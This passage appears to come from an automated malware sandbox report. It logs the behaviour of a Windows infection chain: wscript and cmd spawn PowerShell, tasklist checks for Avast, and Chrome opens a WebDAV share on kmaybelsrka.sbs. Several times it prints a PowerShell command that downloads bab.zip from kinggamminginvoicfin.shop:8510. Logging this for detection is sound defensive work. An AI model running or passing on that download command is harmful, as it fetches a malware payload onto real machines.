      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\crash_reporter.cfg
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://kinggamminginvoicfin.shop:8510/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"

      Persistence and Installation Behavior

      barindex
      Chrome launches external ms-search protocol handler (WebDAV)
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: \Device\RdpDr\;:1\kmaybelsrka.sbs@4843\DavWWWRoot
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: \Device\RdpDr\;:1\kmaybelsrka.sbs@4843\DavWWWRoot
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: \Device\RdpDr\;:1\kmaybelsrka.sbs@4843\DavWWWRoot
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Uses known network protocols on non-standard ports
      Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49712
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 8510
      Source: unknownNetwork traffic detected: HTTP traffic on port 8510 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 4843
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 8510
      Source: unknownNetwork traffic detected: HTTP traffic on port 8510 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 8510
      Source: unknownNetwork traffic detected: HTTP traffic on port 8510 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 4843 -> 49767
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
